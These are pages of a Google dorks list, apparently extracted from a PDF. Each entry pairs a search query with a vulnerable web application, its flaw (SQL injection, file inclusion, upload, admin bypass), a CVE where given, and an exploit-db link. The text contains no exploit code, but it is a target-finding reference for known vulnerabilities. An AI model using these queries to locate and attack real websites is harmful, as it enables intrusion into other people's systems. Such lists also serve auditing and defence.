WHMCS Control 2(announcements.php) SQL Injection:http://www.exploit-db.com/exploits/12481

inurl:inc_catalogmanager.asp inurl:inc_catalogmanager.asp

DMXReady Catalog Manager 1.1Remote Contents Change Vuln:http://www.exploit-db.com/exploits/7766

"This website ispowered by Trio" "This website is powered by Trio"

TriO 2.1 (browse.php id) Remote SQLInjection Vulnerability - CVE: 2008-3418: http://www.exploit-db.com/exploits/6141

content_by_cat.asp?contentid ''catid''

content_by_cat.asp?contentid''catid''

ASPapp KnowledgeBase (catid)Remote SQL Injection Vulnerability:http://www.exploit-db.com/exploits/6590

allinurl:"pollBooth.php?op=results"pollID

allinurl:"pollBooth.php?op=results"pollID

Pollbooth 2.0 (pollID) Remote SQLInjection Vulnerability:http://www.exploit-db.com/exploits/5436

browse_videos.php? browse_videos.php?

phpVID 0.9.9 (categories_type.php cat)SQL Injection Vulnerability - CVE:2007-3610: http://www.exploit-db.com/exploits/4153

inurl:JBSPro inurl:JBSPro

JiRos Banner Experience 1.0 (CreateAdmin Bypass) - CVE: 2006-1213:http://www.exploit-db.com/exploits/1571

inurl:inc_joblistingmanager.asp inurl:inc_joblistingmanager.asp

DMXReady Job Listing 1.1 RemoteContents Change Vulnerability:http://www.exploit-

Page 316: Packetstorm Google Dorks List

db.com/exploits/7771"Factux lefacturier libre V1.1.5"

"Factux le facturier libre V 1.1.5"Factux LFI Vulnerability:http://www.exploit-db.com/exploits/12521

Maintained withthe Ocean12Contact ManagerPro v1.02

Maintained with the Ocean12Contact Manager Pro v1.02

Ocean12 Contact Manager Pro(SQL/XSS/DDV) MultipleVulnerabilities - CVE: 2008-6369:http://www.exploit-db.com/exploits/7244

buyers_subcategories.php?IndustryID=

buyers_subcategories.php?IndustryID=

Softbiz B2B trading MarketplaceScript buyers_subcategories SQLInjection Vulnerability:http://www.exploit-db.com/exploits/12245

"Powered byMinerva" "Powered by Minerva"

Minerva 2.0.21 build 238a(phpbb_root_path) File IncludeVulnerability - CVE: 2006-5077:http://www.exploit-db.com/exploits/2429

inurl:"izle.asp?oyun=" inurl:"izle.asp?oyun="

FoT Video scripti 1.1b (oyun) RemoteSQL Injection Vulnerability - CVE:2008-4176: http://www.exploit-db.com/exploits/6453

inurl:"IDFM=""form.php" inurl:"IDFM=" "form.php"

360 Web Manager 3.0 (IDFM) SQLInjection Vulnerability - CVE: 2008-0430: http://www.exploit-db.com/exploits/4944

inurl:inc_newsmanager.asp inurl:inc_newsmanager.asp

DMXReady News Manager 1.1Arbitrary Category Change Vuln:http://www.exploit-db.com/exploits/7752

Powered byXAOS systems Powered by XAOS systems

XAOS CMS SQL InjectionVulnerability: http://www.exploit-db.com/exploits/14469

inurl:inc_documentlibrarymanager.asp

inurl:inc_documentlibrarymanager.asp

DMXReady Document LibraryManager 1.1 Contents Change Vuln:http://www.exploit-db.com/exploits/7769

inurl:inc_photogallerymanager.asp inurl:inc_photogallerymanager.asp

DMXReady Photo Gallery Manager1.1 Contents Change Vulnerability:http://www.exploit-db.com/exploits/7783

Page 317: Packetstorm Google Dorks List

Powered by Arcticv2.0.0 Powered by Arctic v2.0.0

Artic Issue Tracker 2.0.0 (index.phpfilter) SQL Injection Vulnerability -CVE: 2008-3250: http://www.exploit-db.com/exploits/6097

inurl:"phpRaid""phpRaid""roster.php?Sort=Race"

inurl:"phpRaid" "phpRaid""roster.php?Sort=Race"

phpRaid 3.0.7 (rss.php phpraid_dir)Remote File Inclusion:http://www.exploit-db.com/exploits/3528

inurl:"classifieds.php?cat=" inurl:"classifieds.php?cat="

BM Classifieds Ads SQL InjectionVulnerability: http://www.exploit-db.com/exploits/10314

Powered by: ZanfiSolutions Powered by: Zanfi Solutions

Zanfi CMS lite 1.2 Multiple Local FileInclusion Vulnerabilities - CVE: 2008-4158: http://www.exploit-db.com/exploits/6413

inurl:"index.php?option=com_jequoteform"

inurl:"index.php?option=com_jequoteform"

Joomla Component com_jequoteform -Local File Inclusion - CVE: 2010-2128: http://www.exploit-db.com/exploits/12607

"Powered by SiteX0.7 Beta" "Powered by SiteX 0.7 Beta"

SiteX 0.7.4.418 (THEME_FOLDER)Local File Inclusion Vulnerabilities -CVE: 2009-1846: http://www.exploit-db.com/exploits/8816

inurl:"freshlinks_panel/index.php?linkid"

inurl:"freshlinks_panel/index.php?linkid"

PHP-Fusion Mod freshlinks (linkid)Remote SQL Injection Vuln - CVE:2008-5074: http://www.exploit-db.com/exploits/6620

"SoftwareCategories""FeaturedResources""Search"

"Software Categories" "FeaturedResources" "Search"

HotScripts Clone Script Remote SQLInjection Vulnerability - CVE: 2007-6084: http://www.exploit-db.com/exploits/4633

"Website PoweredBy CreativeSplashWorks -SplashSite"

"Website Powered By CreativeSplashWorks - SplashSite"

Creative SplashWorks-SplashSite(page.php) Blind Sql InjectionVulnerability: http://www.exploit-db.com/exploits/11300

inurl:inc_paypalstoremanager.asp inurl:inc_paypalstoremanager.asp

DMXReady PayPal Store Manager 1.1Contents Change Vulnerability:http://www.exploit-db.com/exploits/7782

Powered ByphpCOIN 1.2.3 Powered By phpCOIN 1.2.3

phpCOIN 1.2.3 (session_set.php)Remote Include Vulnerability - CVE:2006-4424: http://www.exploit-

Page 318: Packetstorm Google Dorks List

db.com/exploits/2254

inurl:"index.php?com_remository" inurl:"index.php?com_remository"

Joomla Component (com_remository)Remote Upload File:http://www.exploit-db.com/exploits/14811

"Developed byQuate.net." "Developed by Quate.net."

Grape Statistics 0.2a (location) RemoteFile Inclusion Vulnerability - CVE:2008-1963: http://www.exploit-db.com/exploits/5463

allinurl:directory.php?ax=list allinurl:directory.php?ax=list

Prozilla Directory Script (directory.phpcat_id) SQL Injection Vulnerbility -CVE: 2007-3809: http://www.exploit-db.com/exploits/4185

inurl:w3.php?nodeId= inurl:w3.php?nodeId=

Aspect Ratio CMS Blind SQLInjection Vulnerability:http://www.exploit-db.com/exploits/15205

UebimiauWebmail v3.2.0-1.8

Uebimiau Webmail v3.2.0-1.8

Uebimiau Web-Mail v3.2.0-1.8Remote File / OverwriteVulnerabilities: http://www.exploit-db.com/exploits/8944

"ATutor 1.6.4" "ATutor 1.6.4"

ATutor 1.6.4 Multiple Cross SiteScripting - CVE: 2010-0971:http://www.exploit-db.com/exploits/11685

"Search | Invite |Mail | Blog |Forum"

"Search | Invite | Mail | Blog |Forum"

Myspace Clone Script Remote SQLInjection Vulnerability - CVE: 2007-5992: http://www.exploit-db.com/exploits/4622

inurl:"index.php?option=com_portfolio"

inurl:"index.php?option=com_portfolio"

Mambo Component Portfolio 1.0(categoryId) SQL InjectionVulnerability: http://www.exploit-db.com/exploits/5139

Powered byArticle DashBoard Powered by Article DashBoard

Article Friendly SQL InjectionVulnerability: http://www.exploit-db.com/exploits/11530

elkagroup - ImageGallery v1.0 - Allright reserved

elkagroup - Image Gallery v1.0 -All right reserved

elkagroup Image Gallery 1.0 ArbitraryFile Upload Vulnerability - CVE:2009-1446: http://www.exploit-db.com/exploits/8514

inurl:post.php?Category=Garage inurl:post.php?Category=Garage GarageSales Remote Upload

Vulnerability: http://www.exploit-

Page 319: Packetstorm Google Dorks List

db.com/exploits/12128

intext:"Poweredby CLscript.com" intext:"Powered by CLscript.com"

CLScript.com Classifieds SoftwareSQL Injection Vunerability - CVE:2010-1660: http://www.exploit-db.com/exploits/12423

"Send amazinggreetings to yourfriends andrelative!"

"Send amazing greetings to yourfriends and relative!"

greeting card Remote UploadVulnerability: http://www.exploit-db.com/exploits/13751

inurl:"index.php?option=com_oziogallery"

inurl:"index.php?option=com_oziogallery"

Joomla Ozio Gallery Component(com_oziogallery) SQL InjectionVulnerability - CVE: 2010-2910:http://www.exploit-db.com/exploits/14462

"Powered byContent Injectorv1.53"

"Powered by Content Injectorv1.53"

Content Injector 1.53 (index.php)Remote SQL Injection Vulnerability -CVE: 2007-6394: http://www.exploit-db.com/exploits/4706

inurl:tabid/176/Default.aspx ORinurl:portals/0/

inurl:tabid/176/Default.aspx ORinurl:portals/0/

DotNetNuke Remote File uploadVulnerability: http://www.exploit-db.com/exploits/12700

inurl:"click.php?hostid=" inurl:"click.php?hostid="

Adult Banner Exchange Website(targetid) SQL Injection Vulnerability -CVE: 2008-6101: http://www.exploit-db.com/exploits/6909

inurl:/tiny_mce/plugins/filemanager/

inurl:/tiny_mce/plugins/filemanager/

TinyMCE MCFileManager 2.1.2Arbitrary File Upload Vulnerability:http://www.exploit-db.com/exploits/15194

inurl:"search_results.php?browse=1"

inurl:"search_results.php?browse=1"

SoftBizScripts Dating Script SQLInjection Vunerability - CVE: 2006-3271: http://www.exploit-db.com/exploits/12438

"powered byfuzzylime" "powered by fuzzylime"

fuzzylime cms 3.01 (admindir) RemoteFile Inclusion Vulnerability - CVE:2008-1405: http://www.exploit-db.com/exploits/5260

Powered byThinkAdmin Powered by ThinkAdmin

ThinkAdmin (page.php) Sql InjectionVulnerability: http://www.exploit-db.com/exploits/11296

phpBazar Ver.2.1.0 phpBazar Ver. 2.1.0 phpBazar-2.1.1fix Remote

Administration-Panel Vulnerability -

Page 320: Packetstorm Google Dorks List

CVE: 2009-4222: http://www.exploit-db.com/exploits/10233

inurl:gotourl.php?id= inurl:gotourl.php?id=

PozScripts Classified Auctions(gotourl.php id) SQL Injection Vuln -CVE: 2008-4755: http://www.exploit-db.com/exploits/6839

inurl:"module=helpcenter" inurl:"module=helpcenter"

Help Center Live2.0.6(module=helpcenter&file=) LocalFile Inclusion - CVE: 2010-1652:http://www.exploit-db.com/exploits/12421

Powered ByPHPhotoalbum Powered By PHPhotoalbum

PHPhotoalbum Remote File UploadVulnerability - CVE: 2009-4819:http://www.exploit-db.com/exploits/10584

"Eyeland StudioInc. All RightsReserved."

"Eyeland Studio Inc. All RightsReserved."

Eyeland Studio Inc. SQL InjectionVulnerability: http://www.exploit-db.com/exploits/13855

"Gallery poweredby fMoblog" "Gallery powered by fMoblog"

Wordpress Plugin fMoblog 2.1 (id)SQL Injection Vulnerability - CVE:2009-0968: http://www.exploit-db.com/exploits/8229

"Powered by OrcaInteractive ForumScript"

"Powered by Orca InteractiveForum Script"

Orca 2.0/2.0.2 (params.php) RemoteFile Inclusion Vulnerability - CVE:2008-5167: http://www.exploit-db.com/exploits/5955

Powered by InfoFisier Powered by Info Fisier

Info Fisier v1.0 SQL InjectionVulnerability: http://www.exploit-db.com/exploits/10726

inurl:"browsecats.php?cid=" inurl:"browsecats.php?cid="

SoftBizScripts Hosting Script SQLInjection Vunerability - CVE: 2005-3817: http://www.exploit-db.com/exploits/12439

"Powered byMySpace ContentZone"

"Powered by MySpace ContentZone"

MySpace Content Zone 3.x RemoteFile Upload Vulnerability - CVE:2007-6668: http://www.exploit-db.com/exploits/4741

allinurl:"com_actualite" allinurl: "com_actualite"

Joomla Component actualite 1.0 (id)SQL Injection Vulnerability - CVE:2008-4617: http://www.exploit-db.com/exploits/5337

inurl:"com_book" inurl:"com_book" Joomla Component com_book SQL

Page 321: Packetstorm Google Dorks List

injection Vulnerability:http://www.exploit-db.com/exploits/11213

"powered byAllMyGuests" "powered by AllMyGuests"

AllMyGuests 0.4.1 (AMG_id) RemoteSQL Injection Vulnerability - CVE:2008-1961: http://www.exploit-db.com/exploits/5469

allinurl :/web3news/ allinurl : /web3news/

Web3news 0.95(PHPSECURITYADMIN_PATH)Remote Include Vuln - CVE: 2006-4452: http://www.exploit-db.com/exploits/2269

" Powered byXpoze " " Powered by Xpoze "

Xpoze 4.10 (home.html menu) BlindSQL Injection Vulnerability - CVE:2008-6352: http://www.exploit-db.com/exploits/7432

Powered byArticleMS fromArticleTrader

Powered by ArticleMS fromArticleTrader

Article Management System 2.1.2Reinstall Vulnerability:http://www.exploit-db.com/exploits/12858

allinurl:"macgurublog.php?uid=" allinurl:"macgurublog.php?uid="

e107 Plugin BLOG Engine 2.1.4Remote SQL Injection Vulnerability -CVE: 2008-6438: http://www.exploit-db.com/exploits/6856

"powered bySniggabo CMS"inurl:article.php?id

"powered by Sniggabo CMS"inurl:article.php?id

Sniggabo CMS (article.php id) RemoteSQL Injection: http://www.exploit-db.com/exploits/8933

inurl:"tr.php?id="Short Url & UrlTracker

inurl:"tr.php?id=" Short Url & UrlTracker

YourFreeWorld Short Url & UrlTracker (id) SQL Injection Vuln -CVE: 2008-4885: http://www.exploit-db.com/exploits/6940

powered byAirvaeCommerce3.0

powered by AirvaeCommerce 3.0

AirvaeCommerce 3.0 (pid) RemoteSQL Injection Vulnerability - CVE:2008-5223: http://www.exploit-db.com/exploits/5689

inurl:"tops_top.php?id_cat ="

inurl: "tops_top.php? id_cat ="

Million Pixels 3 (id_cat) Remote SQLInjection Vulnerability - CVE: 2008-3204: http://www.exploit-db.com/exploits/6044

PHPEmailManager PHPEmailManager

PHP Email Manager (remove.php ID)SQL Injection Vulnerability - CVE:2009-3209: http://www.exploit-db.com/exploits/9470

Page 322: Packetstorm Google Dorks List

"Powered By0DayDB v2.3" "Powered By 0DayDB v2.3"

0DayDB 2.3 (delete id) Remote AdminBypass: http://www.exploit-db.com/exploits/4896

"Powered byExBB " "Powered by ExBB "

ExBB Italiano 0.2 exbb[home_path]Remote File Include Vulnerability -CVE: 2006-4488: http://www.exploit-db.com/exploits/2273

intext:"Poweredby Max.Blog" intext:"Powered by Max.Blog"

Max.Blog 1.0.6 (show_post.php) SQLInjection Vulnerability:http://www.exploit-db.com/exploits/7885

"Powered byActive PHPBookmarks v1.3"inurl:.view_group.php?id=

"Powered by Active PHPBookmarks v1.3"inurl:.view_group.php?id=

Active PHP Bookmarks v1.3 SQLInjection Vulnerability - CVE: 2008-3748: http://www.exploit-db.com/exploits/10597

"txx cms" "txx cms"

Txx CMS 0.2 Multiple Remote FileInclusion Vulnerabilities - CVE: 2007-4819: http://www.exploit-db.com/exploits/4381

Powered by: XPBook v3.0 Powered by: XP Book v3.0

XP Book v3.0 login Admin:http://www.exploit-db.com/exploits/10621

"Powered byispCP Omega" "Powered by ispCP Omega"

ispCP Omega 1.0.4 Remote FileInclude Vulnerability:http://www.exploit-db.com/exploits/11681

inurl:"printer.asp?forum=" inurl:"printer.asp?forum="

ASP Message Board 2.2.1c RemoteSQL Injection Vulnerability - CVE:2007-5887: http://www.exploit-db.com/exploits/4609

inurl:"com_ownbiblio" catalogue inurl:"com_ownbiblio" catalogue

Joomla Component ownbiblio 1.5.3(catid) SQL Injection Vulnerability -CVE: 2008-6184: http://www.exploit-db.com/exploits/6730

"This site ispowered by CMSMade Simpleversion 1."

"This site is powered by CMS MadeSimple version 1."

CMS Made Simple 1.6.2 Local FileDisclosure Vulnerability:http://www.exploit-db.com/exploits/9407

"CMSWebmanager-pro" "CMS Webmanager-pro"

CMS WebManager-Pro MultipleRemote SQL Injection Vulnerabilities -CVE: 2008-2351: http://www.exploit-db.com/exploits/5641

Page 323: Packetstorm Google Dorks List

inurl:"/geeklog/" inurl:"/geeklog/"

GeekLog 1.7.0 (fckeditor) ArbitraryFile Upload Vulnerability:http://www.exploit-db.com/exploits/15277

"Jax Calendarv1.34 by Jack (tR),www.jtr.de/scripting/php"

"Jax Calendar v1.34 by Jack (tR),www.jtr.de/scripting/php"

Jax Calendar 1.34 Remote AdminAccess: http://www.exploit-db.com/exploits/10835

allinurl: "indexphp p shop"categ allinurl: "index php p shop"categ

Koobi Pro 6.25 shop Remote SQLInjection Vulnerability:http://www.exploit-db.com/exploits/5412

Powered byPlatinum 7.6.b.5 Powered by Platinum 7.6.b.5

PHP-Nuke Platinum 7.6.b.5 RemoteFile Inclusion Vulnerability - CVE:2007-5676: http://www.exploit-db.com/exploits/4563

Rash Version:1.2.1 Rash Version: 1.2.1

RQMS (Rash) 1.2.2 Multiple SQLInjection Vulnerabilities:http://www.exploit-db.com/exploits/8433

Powered by:mevin productions Powered by: mevin productions

Basic PHP Events Lister 2 Add Admin:http://www.exploit-db.com/exploits/10515

inurl:/webCal3_detail.asp?event_id=

inurl:/webCal3_detail.asp?event_id=

WebCal (webCal3_detail.asp event_id)SQL Injection Vulnerability - CVE:2009-1945: http://www.exploit-db.com/exploits/8857

inurl:classifieds/view.php?category=

inurl:classifieds/view.php?category=

YourFreeWorld Classifieds (category)Remote SQL Injection Vulnerability -CVE: 2008-3755: http://www.exploit-db.com/exploits/6945

"SignkornGuestbook 1.3" "Signkorn Guestbook 1.3"

Signkorn Guestbook 1.3 (dir_path)Remote File Include Vulnerability -CVE: 2006-4788: http://www.exploit-db.com/exploits/2354

inurl:"catalog/product/detail.php?cat="

inurl:"catalog/product/detail.php?cat="

Webthaiapp detail.php(cat) Blind Sqlinjection Vulnerability:http://www.exploit-db.com/exploits/12467

inurl:user_info.php?user_id= " Or " inurl:index.php?catid= "

inurl: user_info.php?user_id= " Or "inurl: index.php?catid= "

Free Advertisment cms (user_info.php)SQL Injection Vulnerability:http://www.exploit-db.com/exploits/12572

Page 324: Packetstorm Google Dorks List

Poweredby:Traidnt GalleryVersion 1.0.

Powered by:Traidnt GalleryVersion 1.0.

Traidnt Gallery add Admin:http://www.exploit-db.com/exploits/10629

inurl:"powered byeggblog" inurl:"powered by eggblog"

Eggblog 3.07 Remote (SQL Injection /Privilege Escalation) - CVE: 2006-2725: http://www.exploit-db.com/exploits/1842

"pForum 1.30" "pForum 1.30"

pForum 1.30 (showprofil.php id)Remote SQL Injection Vulnerability -CVE: 2008-4355: http://www.exploit-db.com/exploits/6442

Powered By AJAuction Powered By AJ Auction

AJ Auction Pro Platinum (seller_id)SQL Injection Vulnerability - CVE:2008-6004: http://www.exploit-db.com/exploits/6561

faqview.asp?key faqview.asp?key

Techno Dreams FAQ Manager 1.0Remote SQL Injection Vulnerability -CVE: 2006-4892: http://www.exploit-db.com/exploits/2385

"Powered by:MFH v1" "Powered by: MFH v1"

Mega File Hosting Script 1.2 (fid)Remote SQL Injection Vulnerability -CVE: 2008-2521: http://www.exploit-db.com/exploits/5598

inurl:"com_beamospetition" inurl:"com_beamospetition"

Joomla Component(com_beamospetition) SQL InjectionVulnerability: http://www.exploit-db.com/exploits/14502

intitle: phpBazar-AdminPanel intitle: phpBazar-AdminPanel

phpBazar admin InformationDisclosure Vulnerability:http://www.exploit-db.com/exploits/14439

"Powered By4smart" "Powered By 4smart"

Magician Blog 1.0 (ids) Remote SQLInjection Vulnerability:http://www.exploit-db.com/exploits/9282

allinurl:"index.php?showlink"links

allinurl: "index.php?showlink"links

Koobi Pro 6.25 links Remote SQLInjection Vulnerability:http://www.exploit-db.com/exploits/5411

"Aurora CMS" "Aurora CMS"Aurora CMS Remote SQL Injection:http://www.exploit-db.com/exploits/10609

Page 325: Packetstorm Google Dorks List

inurl :/PhotoCart/ inurl :/PhotoCart/

Photo Cart 3.9 (adminprint.php)Remote File Include Vulnerability -CVE: 2006-6093: http://www.exploit-db.com/exploits/2817

"Powered byGetMyOwnArcade"

"Powered by GetMyOwnArcade"

GetMyOwnArcade (search.php query)Remote SQL Injection Vulnerability -CVE: 2007-4386: http://www.exploit-db.com/exploits/4291

Powered By :PersianBB.com Powered By : PersianBB.com

PersianBB (iranian_music.php id)Remote SQL Injection Vulnerability:http://www.exploit-db.com/exploits/6858

alegrocart alegrocartAlegro 1.2.1 SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12278

inurl:/hbcms/php/ inurl:/hbcms/php/HB CMS 1.7 SQL Injection:http://www.exploit-db.com/exploits/9835

"Powered bySimple PHP Textnewsletter"

"Powered by Simple PHP Textnewsletter"

Simple PHP Newsletter 1.5 (olang)Local File Inclusion Vulnerabilities -CVE: 2009-0340: http://www.exploit-db.com/exploits/7813

inurl:"list.php?lcat_id=" inurl:"list.php?lcat_id="

D-Tendencia Bt 2008 SQL InjectionVulnerability: http://www.exploit-db.com/exploits/10494

allinurl:"com_estateagent" allinurl: "com_estateagent"

Mambo Component EstateAgent 0.1Remote SQL Injection Vulnerability -CVE: 2008-0517: http://www.exploit-db.com/exploits/5016

powered by PhpBlue DragonPlatinum

powered by Php Blue DragonPlatinum

Php Blue Dragon CMS 2.9 RemoteFile Include Vulnerability - CVE:2006-2392: http://www.exploit-db.com/exploits/1779

Designed andDeveloped bykarkia E-commerce

Designed and Developed by karkiaE-commerce

E-commerce Group (cat.php) SQLInjection Vulnerability:http://www.exploit-db.com/exploits/12696

"hlstats.php?mode=dailyawardinfo&award=" hlstatsx

"hlstats.php?mode=dailyawardinfo&award=" hlstatsx

HLstatsX v1.65 SQL InjectionVulnerability: http://www.exploit-db.com/exploits/10850

Powered byPlogger! Powered by Plogger! Plogger Remote File Disclosure

Vulnerability: http://www.exploit-

Page 326: Packetstorm Google Dorks List

db.com/exploits/14636

"Powered byDZcms" "Powered by DZcms"

DZcms v.3.1 (products.php pcat)Remote SQL Injection Vulnerability:http://www.exploit-db.com/exploits/7722

inurl:"com_event" inurl:"com_event"

Joomla Component com_eventMultiple Vulnerabilities:http://www.exploit-db.com/exploits/12633

Help DeskSoftware byKayakoSupportSuitev3.70.02

Help Desk Software by KayakoSupportSuite v3.70.02

Kayako eSupport v3.70.02 SQLInjection Vulnerability - CVE: 2010-2911: http://www.exploit-db.com/exploits/14392

inurl:"/alternate_profiles/" inurl:"/alternate_profiles/"

e107 Plugin alternate_profiles (id) SQLInjection Vulnerability - CVE: 2008-4785: http://www.exploit-db.com/exploits/6849

"This website ispowered byMobius"

"This website is powered byMobius"

Mobius 1.4.4.1 (browse.php id)Remote SQL Injection Vulnerability -CVE: 2008-3420: http://www.exploit-db.com/exploits/6138

intitle:WEBEYESGUEST BOOKinurl:.asp?id=

intitle:WEBEYES GUEST BOOKinurl:.asp?id=

WebEyes Guest Book v.3 (yorum.aspmesajid) SQL Injection Vulnerability -CVE: 2009-1950: http://www.exploit-db.com/exploits/8859

"visiteurs v2.0" "visiteurs v2.0"

Les Visiteurs (Visitors) 2.0(config.inc.php) File IncludeVulnerability: http://www.exploit-db.com/exploits/2449

inurl:"com_portfol" inurl:"com_portfol"

Joomla Component com_portfol SQLInjection Vulnerability:http://www.exploit-db.com/exploits/10844

"Powered byZeeMatri" "Powered by ZeeMatri"

ZEEMATRI 3.0 (bannerclick.php adid)SQL Injection Vulnerability - CVE:2008-5782: http://www.exploit-db.com/exploits/7072

inurl:tr.php?id=Banner inurl:tr.php?id= Banner

Banner Management Script (tr.php id)Remote SQL Injection Vulnerability -CVE: 2008-3749: http://www.exploit-db.com/exploits/6276

Page 327: Packetstorm Google Dorks List

Powered By:4images 1.7.1 Powered By: 4images 1.7.1

4images 1.7.1 Remote SQL InjectionVulnerability - CVE: 2006-5236:http://www.exploit-db.com/exploits/10572

intext:"Poweredby Max.Blog" intext:"Powered by Max.Blog"

Max.Blog 1.0.6 (submit_post.php)SQL Injection Vulnerability:http://www.exploit-db.com/exploits/7898

intitle:USP FOSSDistribution intitle:USP FOSS Distribution

USP FOSS Distribution 1.01 (dnld)Remote File Disclosure Vulnerability -CVE: 2007-2271: http://www.exploit-db.com/exploits/3794

"powered bydataface""powered byxataface"

"powered by dataface" "powered byxataface"

Xataface Admin Auth BypassVulnerability: http://www.exploit-db.com/exploits/11852

inurl:"vbplaza.php?do=" inurl:"vbplaza.php?do="

vBulletin vbBux/vbPlaza 2.x(vbplaza.php) Blind SQL InjectionVuln: http://www.exploit-db.com/exploits/8784

allintext:"Poweredby: TotalCalendar"

allintext:"Powered by:TotalCalendar"

TotalCalendar 2.402 (view_event.php)Remote SQL Injection Vulns - CVE:2007-3515: http://www.exploit-db.com/exploits/4130

Powered by PHPDir Submit -DirectorySubmission Script

Powered by PHP Dir Submit -Directory Submission Script

PHP Dir Submit (aid) Remote SQLInjection Vulnerability - CVE: 2009-3970: http://www.exploit-db.com/exploits/9484

intitle:"MAXSITE" intitle:"MAXSITE"

CMS MAXSITE 1.10 (category)Remote SQL Injection Vulnerability -CVE: 2008-2487: http://www.exploit-db.com/exploits/5676

Power withecsportal rel 6.5 Power with ecsportal rel 6.5

ecsportal rel 6.5(article_view_photo.php id) SQLInjection Vulnerability:http://www.exploit-db.com/exploits/8848

inurl:"list.php?c=" inurl:"list.php?c="

Prozilla Top 100 v1.2 Arbitrary DeleteStats Vulnerability - CVE: 2008-1785:http://www.exploit-db.com/exploits/5384

inurl:"weblink_cat_list.php?bcat_id=

inurl:"weblink_cat_list.php?bcat_id="

WHMCompleteSolution CMS sqlInjection Vulnerability:

Page 328: Packetstorm Google Dorks List

" http://www.exploit-db.com/exploits/10493

Powered byYaBBSM V2.5.0Based on YABBSE

Powered by YaBBSM V2.5.0Based on YABB SE

YaBBSM 3.0.0 (Offline.php) RemoteFile Include Vulnerability - CVE:2006-5413: http://www.exploit-db.com/exploits/2553

"Powered byYDC" "Powered by YDC"

YDC (kdlist.php cat) Remote SQLInjection Vulnerability:http://www.exploit-db.com/exploits/6811

Powered byemuCMS Powered by emuCMS

emuCMS 0.3 (cat_id) Remote SQLInjection Vulnerability - CVE: 2008-2891: http://www.exploit-db.com/exploits/5878

intitle:"Rx08.ii36B.Rv" intitle:"Rx08.ii36B.Rv"

RapidLeech Scripts Remote FileUpload Vulnerability:http://www.exploit-db.com/exploits/14430

allinurl:"/lildbi/" allinurl:"/lildbi/"LILDBI Shell Upload Vulnerability:http://www.exploit-db.com/exploits/14443

intext:"Design byBB Media.Org" intext:"Design by BB Media.Org"

BBMedia Design's (news_more.php)SQL Injection Vulnerability:http://www.exploit-db.com/exploits/12718

calendar.asp?eventdetail calendar.asp?eventdetail

AspWebCalendar 2008 Remote FileUpload Vulnerability - CVE: 2008-2832: http://www.exploit-db.com/exploits/5850

Powered by MultiWebsite 1.5 Powered by Multi Website 1.5

Multi Website 1.5 (index php action)SQL Injection Vulnerability - CVE:2009-3150: http://www.exploit-db.com/exploits/9344

Powered byiScriptsVisualCaster

Powered by iScripts VisualCaster

SQli Vulnerability in iScriptsVisualCaster - CVE: 2010-2853:http://www.exploit-db.com/exploits/12451

JBC explorer [ byPsykokwak &XaV ]

JBC explorer [ by Psykokwak &XaV ]

Explorer V7.20 Cross Site ScriptingVulnerability: http://www.exploit-db.com/exploits/10566

"Powered byDesClub.com -

"Powered by DesClub.com -phpLinkat"

phpLinkat 0.1 Insecure CookieHandling / SQL Injection Vulnerability

Page 329: Packetstorm Google Dorks List

phpLinkat" - CVE: 2008-3407: http://www.exploit-db.com/exploits/6140

Powered by: ZanfiSolutions Powered by: Zanfi Solutions

Zanfi CMS lite / Jaw Portal free (page)SQL Injection Vulnerability - CVE:2008-4159: http://www.exploit-db.com/exploits/6423

inurl:"com_equipment" inurl:"com_equipment"

Joomla Component (com_equipment)SQL Injection Vulnerability:http://www.exploit-db.com/exploits/14655

"Everyone shouldbe on TV! Nowyou can upload 2TV"

"Everyone should be on TV! Nowyou can upload 2 TV"

Youtuber Clone (ugroups.php UID)Remote SQL Injection Vulnerability -CVE: 2008-3419: http://www.exploit-db.com/exploits/6147

" created bycreato.biz " " created by creato.biz "

Creato Script SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12807

"Powered by:Southburn" "Powered by: Southburn"

southburn Web (products.php) SqlInjection Vulnerability:http://www.exploit-db.com/exploits/11430

"powered by BlueDove WebDesign"

"powered by Blue Dove WebDesign"

Blue Dove Sql Injection Vulnerability:http://www.exploit-db.com/exploits/11360

infusions/raidtracker_panel/thisraidprogress.php?

infusions/raidtracker_panel/thisraidprogress.php?

PHP-Fusion Mod raidtracker_panel(INFO_RAID_ID) SQL Injection -CVE: 2008-4521: http://www.exploit-db.com/exploits/6682

inurl:"phpsecurepages" inurl:"phpsecurepages"

phpSecurePages 0.28b (secure.php)Remote File Include Vulnerability:http://www.exploit-db.com/exploits/2452

allinurl:"index.php?mod=galerie"action=gal

allinurl:"index.php?mod=galerie"action=gal

KwsPHP Module Galerie (id_gal)Remote SQL Injection Vulnerability -CVE: 2008-6197: http://www.exploit-db.com/exploits/5350

intext:"Poweredby WSN LinksBasic Edition"

intext:"Powered by WSN LinksBasic Edition"

WSN Links Basic Edition (displaycatcatid) SQL Injection Vulnerbility -CVE: 2007-3981: http://www.exploit-db.com/exploits/4209

inurl:"/index.php?option=com_rsfile

inurl:"/index.php?option=com_rsfiles"

Joomla Component RSfiles 1.0.2 (path)File Download Vulnerability - CVE:

Page 330: Packetstorm Google Dorks List

s" 2007-4504: http://www.exploit-db.com/exploits/4307

Powered ByAstroSPACES Powered By AstroSPACES

AstroSPACES (id) Remote SQLInjection Vulnerability - CVE: 2008-4642: http://www.exploit-db.com/exploits/6758

Powered byFluentCMS Powered by FluentCMS

FluentCMS (view.php sid) RemoteSQL Injection Vulnerability - CVE:2008-6642: http://www.exploit-db.com/exploits/5509

inurl:dpage.php?docID inurl:dpage.php?docID

The Real Estate Script (dpage.phpdocID) SQL Injection Vulnerability -CVE: 2008-2443: http://www.exploit-db.com/exploits/5610

inurl:"index.php?option=com_iproperty"

inurl:"index.php?option=com_iproperty"

Joomla Component (com_iproperty)SQL Injection Vulnerability:http://www.exploit-db.com/exploits/14450

"Powered byWebStudioeCatalogue"

"Powered by WebStudioeCatalogue"

WebStudio eCatalogue (pageid) BlindSQL Injection Vulnerability - CVE:2008-5294: http://www.exploit-db.com/exploits/7223

"Powered byNovaBoardv1.1.2"

"Powered by NovaBoard v1.1.2"

NovaBoard v1.1.2 SQL InjectionVulnerability - CVE: 2010-0608:http://www.exploit-db.com/exploits/11278

inurl:/downlot.php?file= inurl:/downlot.php?file=

Lokomedia CMS (sukaCMS) LocalFile Disclosure Vulnerability - CVE:2010-2018: http://www.exploit-db.com/exploits/12651

"Powered byFantastic Newsv2.1.2" or"Powered byFantastic Newsv2.1.3"

"Powered by Fantastic Newsv2.1.2" or "Powered by FantasticNews v2.1.3"

Fantastic News 2.1.3 (script_path)Remote File Include Vulnerability -CVE: 2006-4285: http://www.exploit-db.com/exploits/2221

